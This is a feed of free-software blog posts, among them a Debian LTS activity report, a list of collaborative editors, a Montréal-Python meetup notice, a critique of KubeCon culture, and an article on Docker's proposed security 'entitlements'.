

My free software activities, June 2018

Anarcat - Thu, 06/28/2018 - 12:55

It's been a while since I've done a report here! Since I need to write one for LTS anyway, I figured I would also catch you up on the work I've done in the last three months. Maybe I'll make that my new process: quarterly reports would reduce the overhead on my side with little loss for you, my precious (few? many?) readers.

Debian Long Term Support (LTS)

This is my monthly Debian LTS report.

I skipped the May report because I didn't spend a significant number of hours that month, so this report also covers the handful of hours of work done in May.

May and June were strange months to work on LTS, as we made the transition from wheezy to jessie. I have now worked on all three LTS releases, and I must have been absent during the previous transition, because I found this one a little confusing to go through. Maybe it's because I was on frontdesk duty during that time...

For a week or two it was unclear if we should have worked on wheezy, jessie, or both, or even how to work on either. I documented which packages needed an update from wheezy to jessie and proposed a process for the transition period. This generated a good discussion, but I am not sure we resolved the problems we had this time around in the long term. I also sent patches to the security team in the hope they would land in jessie before it turns into LTS, but most of those ended up being postponed to LTS.

Most of my work this month was spent actually porting the Mercurial fixes from wheezy to jessie. Technically, the patches were ported from upstream 4.3 and led to some pretty interesting results in the test suite, which fails to build from source non-reproducibly. Because I couldn't figure out how to fix this in the allotted time, I uploaded the package to my usual test location in the hope someone else picks it up. The test package fixes 6 issues (CVE-2018-1000132, CVE-2017-9462, CVE-2017-17458 and three issues without a CVE).

I also worked on cups in a similar way, sending a test package to the security team for 2 issues (CVE-2017-18190, CVE-2017-18248). Same for Dokuwiki, where I sent a patch for a single issue (CVE-2017-18123). Those have yet to be published, however, and I will hopefully wrap that up in July.

Because I was looking for work, I ended up doing meta-work as well. I made a prototype that would use the embedded-code-copies file to populate data/CVE/list with related packages, as a way to address a problem we have in LTS triage, where packages that were renamed between suites do not get correctly added to the tracker. It ended up being rejected because the changes were too invasive, but it led to Brian May suggesting another approach; we'll see where that goes.

I've also looked at splitting up that dreaded data/CVE/list, but my results were negative: it looks like git already handles that large file efficiently enough. While a split-up list might be easier on editors, it would be a massive change and was eventually refused by the security team.

Other free software work

With my last report dating back to February, this will naturally be a little imprecise, as three months have passed. But let's see...

LWN

I wrote eight articles in the last three months, for an average of almost three articles a month. I was aiming for an average of one or two a week, so I didn't reach my goal. My last article, about KubeCon, generated a lot of feedback, probably the best I have ever received. It seems I struck a chord with a lot of people, so that certainly feels nice.

Linkchecker

Usual maintenance work, but we finally got access to the Linkchecker organization on GitHub, which meant a bit of reorganizing. The only bit missing now is the PyPI namespace, but that should also come soon. The code of conduct and contribution guides were finally merged after we clarified project membership. This also gives us issue templates, which should help us deal with the constant flow of issues that come in every day.

The biggest concerns I have with the project now are the C parser and the outdated Windows executable. The latter has been removed from the website, so hopefully Windows users won't report old bugs (although that also means we won't gain new Windows users at all), and the former might be fixed by a port to BeautifulSoup.

Email over SSH

I did a lot of work to switch away from SMTP and IMAP to synchronise my workstation and laptops with my mailserver. Having the privilege of running my own server has its perks: I have SSH access to my mail spool, which brings the opportunity for interesting optimizations.

The first is called rsendmail. Inspired by work from Don Armstrong and David Bremner, rsendmail is a Python program I wrote from scratch to deliver email over a pipe, securely. I do not trust the sendmail command: its behavior can vary a lot between platforms (e.g. allowing the mail queue to be flushed or printed) and I wanted to reduce the attack surface. It works with another program I wrote called sshsendmail, which connects to it over a pipe. It integrates well with "dumb" MTAs like nullmailer, but I also use it with the popular Postfix, without problems.
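As a rough illustration of the pipe-over-SSH idea (this is not the actual rsendmail or sshsendmail code; the host name, remote command and calling convention are placeholders), a minimal client boils down to piping a message into a remote delivery program:

#!/usr/bin/env python3
"""Minimal sketch: deliver a message by piping it to a remote
delivery command over SSH instead of speaking SMTP. The host name,
remote command and argument handling are placeholders, not the
real rsendmail interface."""

import subprocess
import sys


def send(recipients, message_bytes, host="mail.example.com"):
    # Run the remote delivery program over SSH and feed it the
    # message on stdin; "--" keeps recipients from being parsed
    # as options.
    cmd = ["ssh", host, "rsendmail", "--"] + list(recipients)
    subprocess.run(cmd, input=message_bytes, check=True)


if __name__ == "__main__":
    send(sys.argv[1:], sys.stdin.buffer.read())

The point of the design is that the only thing exposed on the server side is a small, dedicated delivery program, rather than the platform's multi-purpose sendmail binary.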

The second is to switch from OfflineIMAP to Syncmaildir (SMD). The latter allows synchronization over SSH only. The migration was a little difficult but I very much like the results: SMD is faster than OfflineIMAP and works transparently in the background.

I really like using SSH for email. I used to have my email password stored all over the place: in my Postfix config, in my email clients' memory; it was a mess. With the new configuration, things just work unattended, and email feels like a solved problem, at least the synchronization aspects of it.

Emacs

As often happens, I've done some work on my Emacs configuration. I switched to a new Solarized theme, the bbatsov version, which supports both a light and a dark mode and generally has better colors. I had problems with the cursor, which are unfortunately still unfixed.

I learned about and used the Emacs IPython Notebook (EIN) project and filed a feature request to replicate the "restart and run" behavior of the web interface. Otherwise it's really nice to have a decent editor to work on Python notebooks, and I have used it to work on the terminal emulators series and the related source code.

I have also tried to complete my conversion to Magit, a pretty nice Emacs wrapper around git. Some of my usual git shortcuts have good replacements, but not all. For example, these are equivalent:

  • vc-annotate (C-x C-v g): magit-blame
  • vc-diff (C-x C-v =): magit-diff-buffer-file

Those do not have a direct equivalent:

  • vc-next-action (C-x C-q, or F6): anarcat/magit-commit-buffer, see below
  • vc-git-grep (F8): no replacement

I wrote my own replacement for "diff and commit this file" as the following function:

(defun anarcat/magit-commit-buffer ()
  "commit the changes in the current buffer on the fly

This is different than `magit-commit' because it calls `git commit'
without going through the staging area AKA index first. This is a
replacement for `vc-next-action'.

Tip: setting the git configuration parameter `commit.verbose' to 2
will show the diff in the changelog buffer for review. See
`git-config(1)' for more information.

An alternative implementation was attempted with `magit-commit':

  (let ((magit-commit-ask-to-stage nil))
    (magit-commit (list \"commit\" \"--\"
                        (file-relative-name buffer-file-name))))

But it seems `magit-commit' asserts that we want to stage content and
will fail with: `(user-error \"Nothing staged\")'. This is why this
function calls `magit-run-git-with-editor' directly instead."
  (interactive)
  (magit-run-git-with-editor (list "commit" "--"
                                   (file-relative-name buffer-file-name))))

It's not very pretty, but it works... Mostly. Sometimes the magit-diff buffer becomes out of sync, but the --verbose output in the commitlog buffer still works.

I've also looked at git-annex integration. The magit-annex package did not work well for me: the file listing is really too slow. So I found the git-annex.el package, but did not try it out yet.

While working on all of this, I fell into a different rabbit hole: I found it inconvenient to "pastebin" stuff from Emacs, as it would involve selecting a region, piping it to pastebinit, and copy-pasting the URL found in the *Messages* buffer. So I wrote this first prototype:

(defun pastebinit (begin end)
  "pass the region to pastebinit and add output to killring

TODO: prompt for possible pastebins (pastebinit -l) with prefix arg

Note that there's a `nopaste.el' project which already does this,
which we should use instead."
  (interactive "r")
  (message "use nopaste.el instead")
  (let ((proc (make-process :filter #'pastebinit--handle
                            :command '("pastebinit")
                            :connection-type 'pipe
                            :buffer nil
                            :name "pastebinit")))
    (process-send-region proc begin end)
    (process-send-eof proc)))

(defun pastebinit--handle (proc string)
  "handle output from pastebinit asynchronously"
  (let ((url (car (split-string string))))
    (kill-new url)
    (message "paste uploaded and URL added to kill ring: %s" url)))

It was my first foray into asynchronous process operations in Emacs: difficult and confusing, but it mostly worked. Those who know me know what's coming next, however: I found not only one, but two libraries for pastebins in Emacs: nopaste and (after patching nopaste to add asynchronous and customize support, of course) debpaste.el. I'm not sure where that will go: there is a proposal to add nopaste to Debian that was discussed a while back, and I made a detailed report there.

Monkeysign

I made a minor release of Monkeysign to cover for CVE-2018-12020, the GnuPG "SigSpoof" vulnerability. I am not sure where to take this project anymore, and I opened a discussion about possibly retiring it completely. Feedback welcome.

ikiwiki

I wrote a new ikiwiki plugin called bootstrap to fix table markup to match what the Bootstrap theme expects. This was particularly important for the previous blog post, which uses tables a lot. It was surprisingly easy and might be useful for tweaking other parts of the theme.

Random stuff
  • I wrote up a review of the security of APT packages compared with the TUF project, in TufDerivedImprovements
  • contributed to about 20 different repositories on GitHub, too numerous to list here

Historical inventory of collaborative editors

Anarcat - Tue, 06/26/2018 - 13:19

A quick inventory of major collaborative editor efforts, in chronological order.

As with any such list, it must start with an honorable mention of the mother of all demos, during which Doug Engelbart presented what is basically an exhaustive list of all possible software written since 1968. This includes not only a collaborative editor, but also graphics, programming and math editors.

Everything else after that demo is just a slower implementation to compensate for the acceleration of hardware.

Software gets slower faster than hardware gets faster. - Wirth's law

So without further ado, here is the list of notable collaborative editors that I could find. By "notable" I mean that they introduce a notable feature or implementation detail.

  • SubEthaEdit (2003-2015?; Mac-only): first collaborative, real-time, multi-cursor editor I could find. A reverse-engineering attempt in Emacs failed to produce anything.
  • DocSynch (2004-2007; ?): built on top of IRC!
  • Gobby (2005-now; C, multi-platform): first open, solid and reliable implementation, and still around! The protocol ("libinfinoted") is notoriously hard to port to other editors (e.g. Rudel failed to implement it in Emacs). The 0.7 release in January 2017 adds possible Python bindings that might improve this. Interesting plugins: autosave to disk.
  • Ethercalc (2005-now; Web, JavaScript): first spreadsheet, along with Google Docs.
  • moonedit (2005-2008?; ?): original website died. Other users' cursors were visible and keystroke noises were emulated. Included a calculator and a music sequencer!
  • synchroedit (2006-2007; ?): first web app.
  • Inkscape (2007-2011; C++): first graphics editor with collaborative features, backed by the "whiteboard" plugin built on top of Jabber, now defunct.
  • Abiword (2008-now; C++): first word processor.
  • Etherpad (2008-now; Web): first solid web app. Originally developed as a heavy Java app in 2008, acquired and open-sourced by Google in 2009, then rewritten in Node.js in 2011. Widely used.
  • Wave (2009-2010; Web, Java): failed attempt at a grand protocol unification.
  • CRDT (2011; specification): standard for reliably replicating a document's data structure among different computers.
  • Operational transform (2013; specification): similar to CRDT, yet, well, different.
  • Floobits (2013-now; ?): commercial, but with open-source plugins for different editors.
  • LibreOffice Online (2015-now; Web): free Google Docs equivalent, now integrated in Nextcloud.
  • HackMD (2015-now; ?): commercial but open source. Inspired by Hackpad, which was bought by Dropbox.
  • Cryptpad (2016-now; web?): spin-off of XWiki. Encrypted, "zero-knowledge" on the server.
  • Prosemirror (2016-now; Web, Node.js): "Tries to bridge the gap between Markdown text editing and classical WYSIWYG editors." Not really an editor, but something that can be used to build one.
  • Quill (2013-now; Web, Node.js): rich text editor, also JavaScript. Not sure it is really collaborative.
  • Teletype (2017-now; WebRTC, Node.js): for GitHub's Atom editor; introduces a "portal" idea that makes guests follow what the host is doing across multiple documents. Peer-to-peer with WebRTC after a visit to an introduction server; CRDT-based.
  • Tandem (2018-now; Node.js?): plugins for Atom, Vim, Neovim, Sublime... Uses a relay to set up p2p connections; CRDT-based. Dubious license issues were resolved thanks to the involvement of Debian developers, which makes it a promising standard to follow in the future.

Other lists

Montréal-Python 72 - Carroty Xenophon

Montreal Python - Sun, 06/03/2018 - 23:00

Let’s meet one last time before our Summer break! Thanks to Notman House for sponsoring this event.

Presentations

Socket - Éric Lafontaine

Most of our everyday jobs involve making requests over the internet or hosting a web solution for our company. Each connection we make uses the socket API in some way that is not always obvious. By giving this talk, I hope to elucidate some of the magic contained in the socket API. I'm also going to give away some tricks that I've been using since understanding that API.

Probabilistic Programming and Bayesian Modeling with PyMC3 - Christopher Fonnesbeck

Bayesian statistics offers powerful, flexible methods for data analysis that, because they are based on full probability models, confer several benefits to analysts including scalability, straightforward quantification of uncertainty, and improved interpretability relative to classical methods. The advent of probabilistic programming has served to abstract the complexity associated with fitting Bayesian models, making such methods more widely available. PyMC3 is software for probabilistic programming in Python that implements several modern, computationally-intensive statistical algorithms for fitting Bayesian models. PyMC3's intuitive syntax is helpful for new users, and its reliance on the Theano library for fast computation has allowed developers to keep the code base simple, making it easy to extend and expand the software to meet analytic needs. Importantly, PyMC3 implements several next-generation Bayesian computational methods, allowing for more efficient sampling for small models and better approximations to larger models with larger associated datasets. I will demonstrate how to construct, fit and check models in PyMC, using a selection of applied problems as motivation.
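To make that workflow concrete, here is a minimal sketch of fitting a model in PyMC3 (this example is mine, not the speaker's; the data and priors are arbitrary):

import numpy as np
import pymc3 as pm

# Arbitrary observed data, just for the sake of the example.
data = np.random.normal(loc=1.0, scale=2.0, size=200)

with pm.Model():
    # Priors for the unknown mean and standard deviation.
    mu = pm.Normal("mu", mu=0, sd=10)
    sigma = pm.HalfNormal("sigma", sd=5)
    # Likelihood of the observed data.
    pm.Normal("obs", mu=mu, sd=sigma, observed=data)
    # Draw posterior samples with the default NUTS sampler.
    trace = pm.sample(1000, tune=1000)

# Check the fit: posterior summaries and convergence diagnostics.
print(pm.summary(trace))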

When

Monday June 11th, 2018 at 6PM

Where

Notman House

51 Sherbrooke West

Montréal, QC

H2X 1X2

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:00PM - End of the event
  • 8:15PM - Benelux

Diversity, education, privilege and ethics in technology

Anarcat - Sat, 05/26/2018 - 11:48

This article is part of a series on KubeCon Europe 2018.

This is a rant I wrote while attending KubeCon Europe 2018. I do not know how else to frame the deep discomfort I have with the way one of the most cutting-edge projects in my community is moving. I see it as a symptom of so many things wrong in society at large, and figured it was as good a way as any to open the discussion regarding how free software communities seem to naturally evolve into corporate money-making machines with questionable ethics.

A white man groomed by a white woman

Diversity and education

There is often a great point made of diversity at KubeCon, and that is something I truly appreciate. It's one of the places where I have seen the largest efforts towards that goal; I was impressed by the efforts made in Austin, and mentioned it in my overview of that conference back then. Yet it is still one of the least diverse places I've ever participated in: in comparison, Pycon "feels" more diverse, for example. And then, of course, there's real life out there, where women constitute basically half the population. This says something about the actual effectiveness of diversity efforts in our communities.

4000 white men

The truth is that, contrary to programmer communities, "operations" knowledge (sysadmin, SRE, DevOps, whatever it's called these days) comes not from institutional education, but from self-learning. Even though I have years of university training, the day-to-day knowledge I need in my work as a sysadmin comes not from the university, but from late-night experiments on my personal computer network. This was first on the Macintosh, then on the FreeBSD source code passed down as a magic word from an uncle, and finally through Debian, consecrated as the leftist's true computing way. Sure, my programming skills were useful there, but I acquired those before going to university: even there, teachers expected students to learn programming languages (such as C!) in between sessions.

Diversity program

The real solutions to the lack of diversity in our communities come not only from a change in culture, but also from real investments in society at large. The mega-corporations subsidizing events like KubeCon make sure they get a lot of good press from those diversity programs. However, the money they spend on them is nothing compared to the taxes they evade in their home states. As an example, Amazon recently put 7000 jobs on hold because of a tax the city of Seattle wanted to impose on corporations to help the homeless population. Google, Facebook, Microsoft, and Apple all evade taxes like gangsters. This is important because society changes partly through education, and that costs money. Education is how more traditional STEM sectors like engineering and medicine have changed: women, minorities, and poorer populations were finally allowed into schools after the epic social struggles of the 1970s finally yielded more accessible education. Just as culture changes are seeing a backlash, the tide is turning there as well, and the trend is reversing towards more costly, less accessible education. But not everywhere. The impacts of education changes are long-lasting. By evading taxes, those companies are depriving the state of revenues that could level the playing field through affordable education.

Hell, any education in the field would help. There is basically no sysadmin education curriculum right now. Sure, you can follow Cisco CCNA or Microsoft MCSE private training. But anyone who's been seriously involved in running any computing infrastructure knows those are a scam: they will tie you down to a proprietary universe (Cisco and Microsoft, respectively), and will probably lead only to "remote hands monkey" positions and rarely to executive ones.

Velocity

Besides, providing an education curriculum would require the field to slow down so that knowledge could settle and trickle into a curriculum. Configuration management is pretty old, but because the tooling changes so fast, any curriculum built in the last decade (or even less) quickly becomes irrelevant. Puppet publishes a new release every 6 months, and Kubernetes, barely 4 years old, is changing rapidly with a ~3-month release schedule.

Here at KubeCon, Mark Zuckerberg's mantra of "move fast and break things" is everywhere. We call it "velocity": where you are going does not matter as much as how fast you're going there. At one of the many keynotes, Abby Kearns from the Cloud Foundry Foundation boasted about how Home Depot, in trying to sell more hammers than Amazon, is now deploying code to production multiple times a day. I am still unclear as to whether this made Home Depot actually sell more hammers, or whether it's something we should even care about in the first place. Shouldn't we converge on selling fewer hammers? Making them more solid and reliable, so that they are passed down through generations instead of breaking and having to be replaced all the time?

Home Depot ecstasy

We're solving a problem that wasn't there, in some new absurd faith that code deployments will naturally make people happier, by making sure Home Depot sells more hammers. And that's after being told that Cloud Foundry helped the USAF save $600M by moving its databases to the cloud. No one seems bothered by the idea that the most powerful military in existence would move state secrets into a private cloud, out of the control of any government. It's the name of the game at KubeCon.

USAF saves (money)

In his keynote, Alexis Richardson, CEO of Weaveworks, presented the toaster project as an example of what not to do. "He did not use any sourced components, everything was built from scratch, by hand", obviously missing the fact that toasters are deliberately not built from reusable parts, as part of their planned-obsolescence design. The goal of the toaster experiment is also to show how fragile our civilization has become, precisely because we depend on layers upon layers of parts. In this totalitarian view of the world, people are also "reusable" or, in that case, "disposable components": not just the white dudes in California, but also the workers outsourced out of the USA decades ago. It depends on precious metals and the miners of Africa, on the specialized labour of the factories and the intricate knowledge of the factory workers in Asia, and on the flooded forests of the first nations powering this terrifying surveillance machine.

Privilege

"Left to his own devices he couldn’t build a toaster. He could just about make a sandwich and that was it." -- Mostly Harmless, Douglas Adams, 1992

Staying in a hotel room for a week, all expenses paid, certainly puts things in perspective. Rarely have I felt more privileged in my entire life: someone else makes my food, makes my bed, and magically cleans the toilet when I'm gone. For me, this is extraordinary, but for many people at KubeCon, it's routine: traveling is part of the rock-star agenda of this community. People get used to being served, both directly in their day-to-day lives, and through the complex supply chain of the modern technology that is destroying the planet.

Nothing is like corporate nothing.

The nice little boxes and containers we call the cloud abstract all of this away from us, and those dependencies are actively encouraged in the community. We like containers here and their image is ubiquitous. We acknowledge that a single person cannot run a Kube shop because the knowledge is too broad to be handled by a single person. While there are interesting collaborative and social ideas in that approach, I am deeply skeptical of its impact on civilization in the long run. We have already created systems so complex that we don't truly know who hacked the Trump election, or how. Many feel it was hacked, but it's really just a hunch: there were bots, maybe they were Russian, or maybe from Cambridge? The DNC emails, was that really Wikileaks? Who knows! Never mind failing closed or open: the system has become so complex that we don't even know how we fail when we do. Even those in the highest positions of power seem unable to protect themselves; politics seems to have become a game of Russian roulette: we cock the bot, roll the secret algorithm, and see which dictator shoots out.

Ethics

All this is to build a new Skynet; not this one or that one, those already exist. I was able to joke pleasantly about the AI takeover during breakfast with a random stranger without raising so much as an eyebrow: we know it will happen, oh well. I've skipped that track in my attendance, but multiple talks at KubeCon are about AI, TensorFlow (it's open source!), self-driving cars, and removing humans from the equation as much as possible, as a general principle. Kubernetes is often shortened to "Kube", which I always think of as a reference to the Star Trek Borg's almighty ship, the "cube". This might actually make sense given that Kubernetes is an open-source version of Google's internal software incidentally called... Borg. Making such fleeting, tongue-in-cheek references to a totalitarian civilization is not harmless: it makes more acceptable the notion that AI domination is inescapable and that resistance truly is futile, the ultimate neo-colonial scheme.

"We are the Borg. Your biological and technological distinctiveness will be added to our own. Resistance is futile."

The "hackers" of our age are building this machine with conscious knowledge of the social and ethical implications of their work. At best, people admit to not knowing what those implications really are. In the worst-case scenario, the AI apocalypse will bring massive unemployment and a collapse of industrial civilization, to which Silicon Valley executives are responding by buying bunkers to survive the eventual roaming gangs of revolted (and now armed) teachers and young students coming for revenge.

Only the most privileged people in society could imagine such a scenario and actually opt out of society as a whole. Even the robber barons of the 20th century knew they couldn't survive the coming revolution: Andrew Carnegie built libraries after creating the steel empire that drove much of US industrialization near the end of the century and John D. Rockefeller subsidized education, research and science. This is not because they were humanists: you do not become an oil tycoon by tending to the poor. Rockefeller said that "the growth of a large business is merely a survival of the fittest", a social darwinist approach he gladly applied to society as a whole.

But the 70's rebel beat offspring, the children of the cult of Job, do not seem to have the depth of analysis to understand what's coming for them. They want to "hack the system" not for everyone, but for themselves. Early on, we have learned to be selfish and self-driven: repressed as nerds and rejected in the schools, we swore vengeance on the bullies of the world, and boy are we getting our revenge. The bullied have become the bullies, and it's not small boys in schools we're bullying, it is entire states, with which companies are now negotiating as equals.

The fraud

...but what are you creating exactly?

And that is the ultimate fraud: making the world believe we are harmless little boys, so repressed that we can't communicate properly. We're so sorry we're awkward; it's because we're all somewhat on the autism spectrum. Isn't that, after all, a convenient affliction for people who would not dare confront the oppression they are creating? It's too easy to hide behind such a real and serious condition, one that does affect people in our community, but also truly autistic people who simply cannot make it in the fast-moving world the magical rain man is creating. But the real con is hacking power and political control away from traditional institutions, seen as too slow-moving to really accomplish the "change" that is "needed". We are creating an inextricable technocracy that no one will understand, not even us "experts". Instead of serving the people, the machine is at the mercy of markets and powerful oligarchs.

A recurring pattern at Kubernetes conferences is the KubeCon chant where Kelsey Hightower reluctantly engages the crowd in a pep chant:

When I say 'Kube!', you say 'Con!'

'Kube!' 'Con!' 'Kube!' 'Con!' 'Kube!' 'Con!'

Cube Con indeed...

I wish I had some wise parting thoughts about where to go from here or how to change this. The tide seems so strong that all I can do is observe and tell stories. My hope is that the people who need to hear this will take it the right way, but I somehow doubt it. With luck, it might just become irrelevant and everything will fix itself, but somehow I fear things will get worse before they get better.


Easier container security with entitlements

Anarcat - Mon, 05/21/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

During KubeCon + CloudNativeCon Europe 2018, Justin Cormack and Nassim Eddequiouaq presented a proposal to simplify the setting of security parameters for containerized applications. Containers depend on a large set of intricate security primitives that can have weird interactions. Because they are so hard to use, people often just turn the whole thing off. The goal of the proposal is to make those controls easier to understand and use; it is partly inspired by mobile apps on iOS and Android platforms, an idea that trickled back into Microsoft and Apple desktops. The time seems ripe to improve the field of container security, which is in desperate need of simpler controls.

The problem with container security

Cormack first stated that container security is too complicated. His slides stated bluntly that "unusable security is not security" and he pleaded for simpler container security mechanisms with clear guarantees for users.

"Container security" is a catchphrase that actually includes all sorts of measures, some of which we have previously covered. Cormack presented an overview of those mechanisms, including capabilities, seccomp, AppArmor, SELinux, namespaces, control groups — the list goes on. He showed how docker run --help has a "ridiculously large number of options"; there are around one hundred on my machine, with about fifteen just for security mechanisms. He said that "most developers don't know how to actually apply those mechanisms to make sure their containers are secure". In the best-case scenario, some people may know what the options are, but in most cases people don't actually understand each mechanism in detail.

He gave the example of capabilities; there are about forty possible values that can be provided for the --cap-drop option, each with its own meaning. He described some capabilities as "understandable", but said that others end up in overly broad boxes. The kernel's data structure limits the system to a maximum of 64 capabilities, so a bunch of functionality was lumped together into CAP_SYS_ADMIN, he said.

Cormack also talked about namespaces and seccomp. While there are fewer namespaces than capabilities, he said that "it's very unclear for a general user what their security properties are". For example, "some combinations of capabilities and namespaces will let you escape from a container, and other ones don't". He also described seccomp as a "long JSON file", as that's the way Kubernetes configures it. Even though those files could "usefully be even more complicated", he said that they are "very difficult to write".
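To give a sense of how many low-level knobs a developer is currently expected to juggle, here is a sketch using the Docker Python SDK (the image name, capability list, and seccomp profile path are placeholders, and the capability set is illustrative rather than a recommendation):

import docker

client = docker.from_env()

# Read a hand-written seccomp profile, the "long JSON file"
# mentioned above; seccomp.json is a placeholder path.
with open("seccomp.json") as f:
    seccomp_profile = f.read()

# Drop every capability, then add back only the few this
# particular service is assumed to need.
client.containers.run(
    "example/webapp:1.0",  # placeholder image
    detach=True,
    cap_drop=["ALL"],
    cap_add=["NET_BIND_SERVICE", "CHOWN", "SETUID", "SETGID"],
    security_opt=["seccomp=" + seccomp_profile],
)

Getting the capability list and the seccomp profile right requires exactly the kind of detailed knowledge of each mechanism that, as the speakers point out, most developers do not have.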

Cormack stopped his enumeration there, but the same applies to the other mechanisms. He said that while developers could sit down and write those policies for their application by hand, it's a real mess and makes their heads explode. So instead developers run their containers in --privileged mode. It works, but it disables all the nice security mechanisms that the container abstraction provides. This is why "containers do not contain", as Dan Walsh famously quipped.

Introducing entitlements

There must be a better way. Eddequiouaq proposed this simple idea: "provide something humans can actually understand without diving into code or possibly even without reading documentation". The solution proposed by the Docker security team is "entitlements": the ability for users to choose simple permissions on the command line. Eddequiouaq said that application users and developers alike don't need to understand the low-level security mechanisms or how they interact within the kernel; "people don't care about that, they want to make sure their app is secure."

Entitlements divide resources into meaningful domains like "network", "security", or "host resources" (like devices). Behind the scenes, Docker translates those into whatever security mechanisms are available. This implies that the actual mechanism deployed will vary between runtimes, depending on the implementation. For example, a "confined" network access might mean a seccomp filter blocking all networking-related system calls except socket(AF_UNIX|AF_LOCAL) along with dropping network-related capabilities. AppArmor will deny network on some platforms while SELinux would do similar enforcement on others.
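To make the translation step concrete, here is a purely illustrative sketch of what such a mapping could look like (the entitlement names other than those mentioned in the talk, the syscall lists, and the capability lists are placeholders of mine, not the actual Docker specification):

# Hypothetical mapping from high-level entitlements to the low-level
# mechanisms a runtime might configure behind the scenes; names and
# contents are illustrative only.
ENTITLEMENTS = {
    "network.confined": {
        # seccomp: block networking-related system calls, except
        # socket() when it creates AF_UNIX/AF_LOCAL sockets.
        "seccomp_block": ["connect", "bind", "listen", "accept4"],
        "seccomp_allow_socket_families": ["AF_UNIX", "AF_LOCAL"],
        # drop network-related capabilities
        "cap_drop": ["NET_ADMIN", "NET_RAW", "NET_BIND_SERVICE"],
    },
    "network.admin": {
        # full network access: nothing blocked, nothing dropped
        "seccomp_block": [],
        "cap_drop": [],
    },
}

def to_runtime_config(entitlement):
    """Return the low-level settings for one entitlement."""
    return ENTITLEMENTS[entitlement]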

Eddequiouaq said the complexity of implementing those mechanisms is the responsibility of platform developers. Image developers can ship entitlement lists along with container images created with a regular docker build, and sign the whole bundle with docker trust. Because entitlements do not specify explicit low-level mechanisms, the resulting image is portable to different runtimes without change. Such portability helps Kubernetes on non-Linux platforms do its job.

Entitlements shift the responsibility for configuring sandboxing environments to image developers, but also empowers them to deliver security mechanisms directly to end users. Developers are the ones with the best knowledge about what their applications should or should not be doing. Image end-users, in turn, benefit from verifiable security properties delivered by the bundles and the expertise of image developers when they docker pull and run those images.

Eddequiouaq gave a demo of the community's nemesis: Docker inside Docker (DinD). He picked that use case because it requires a lot of privileges, which usually means using the dreaded --privileged flag. With the entitlements patch, he was able to run DinD with network.admin, security.admin, and host.devices.admin, which looks like --privileged, but actually means some protections are still in place. According to Eddequiouaq, "everything works and we didn't have to disable all the seccomp and AppArmor profiles". He also gave a demo of how to build an image and demonstrated how docker inspect shows the entitlements bundled inside the image. With such an image, docker run starts a DinD image without any special flags. That requires a way to trust the content publisher because suddenly images can elevate their own privileges without the caller specifying anything on the Docker command line.

Goals and future

The specification aims to provide the best user experience possible, so that people actually start using the security mechanisms provided by the platforms instead of opting out of security configurations when they get a "permission denied" error. Eddequiouaq said that Docker eventually wants to "ditch the --privileged flag because it is really a bad habit". Instead, applications should run with the least privileges they need. He said that "this is not the case; currently, everyone works with defaults that work with 95% of the applications out there." Those Docker defaults, he said, provide a "way too big attack surface".

Eddequiouaq opened the door for developers to define custom entitlements because "it's hard to come up with a set that will cover all needs". One way the team thought of dealing with that uncertainty is to have versions of the specification but it is unclear how that would work in practice. Would the version be in the entitlement labels (e.g. network-v1.admin), or out of band?

Another feature proposed is the control of API access and service-to-service communication in the security profile. This is something that's actually available on phones, where an app can only talk with a specific set of services. But that is also relevant to containers in Kubernetes clusters as administrators often need to restrict network access with more granularity than the "open/filter/close" options. An example of such policy could allow the "web" container to talk with the "database" container, although it might be difficult to specify such high-level policies in practice.
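For comparison, the closest thing Kubernetes offers today for that kind of "web may talk to database" rule is a NetworkPolicy object, which only covers network reachability rather than API-level access. A minimal sketch, written here as a Python dict mirroring the YAML and using made-up label names:

# Allow only pods labelled app=web to reach pods labelled app=database.
network_policy = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "NetworkPolicy",
    "metadata": {"name": "allow-web-to-database"},
    "spec": {
        "podSelector": {"matchLabels": {"app": "database"}},
        "policyTypes": ["Ingress"],
        "ingress": [
            {"from": [{"podSelector": {"matchLabels": {"app": "web"}}}]},
        ],
    },
}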

While entitlements are now implemented in Docker as a proof of concept, Kubernetes has the same usability issues as Docker so the ultimate goal is to get entitlements working in Kubernetes runtimes directly. Indeed, its PodSecurityPolicy maps (almost) one-to-one with the Docker security flags. But as we have previously reported, another challenge in Kubernetes security is that the security models of Kubernetes and Docker are not exactly identical.

Eddequiouaq said that entitlements could help share best security policies for a pod in Kubernetes. He proposed that such configuration would happen through the SecurityContext object. Another way would be an admission controller that would avoid conflicts between the entitlements in the image and existing SecurityContext profiles already configured in the cluster. There are two possible approaches in that case: the rules from the entitlements could expand the existing configuration or restrict it where the existing configuration becomes a default. The problem here is that the pod's SecurityContext already provides a widely deployed way to configure security mechanisms, even if it's not portable or easy to share, so the proposal shouldn't break existing configurations. There is work in progress in Docker to allow inheriting entitlements within a Dockerfile. Eddequiouaq proposed that Kubernetes should implement a simple mechanism to inherit entitlements from images in the admission controller.

The Docker security team wants to create a "widely adopted standard" supported by Docker swarm, Kubernetes, or any container scheduler. But it's still unclear how deep into the Kubernetes stack entitlements belong. In the team's current implementation, Docker translates entitlements into the security mechanisms right before calling its runtime (containerd), but it might be possible to push the entitlements concept straight into the runtime itself, as it knows best how the platform operates.

Some readers might also notice fundamental similarities between this and other mechanisms such as OpenBSD's pledge(), which made me wonder if entitlements belong in user space in the first place. Cormack observed that seccomp was such a "pain to work with to do complicated policies". He said that having eBPF seccomp filters would make it easier to deal with conflicts between policies and also mentioned the work done on the Checmate and Landlock security modules as interesting avenues to explore. It seems that none of those kernel mechanisms are ready for prime time, at least not to the point that Docker can use them in production. Eddequiouaq said that the proposal was open to changes and discussion so this is all work in progress at this stage. The next steps are to make a proposal to the Kubernetes community before working on an actual implementation outside of Docker.

I have found the core idea of protecting users from all the complicated stuff in container security interesting. It is a recurring theme in container security; we've previously discussed proposals to add container identifiers in the kernel directly for example. Everyone knows security is sensitive and important in Kubernetes, yet doing it correctly is hard. This is a recipe for disaster, which has struck in high profile cases recently. Hopefully having such easier and cleaner mechanisms will help users, developers, and administrators alike.

A YouTube video and slides [PDF] of the talk are available.

This article first appeared in the Linux Weekly News.


Securing the container image supply chain

Anarcat - Thu, 05/17/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

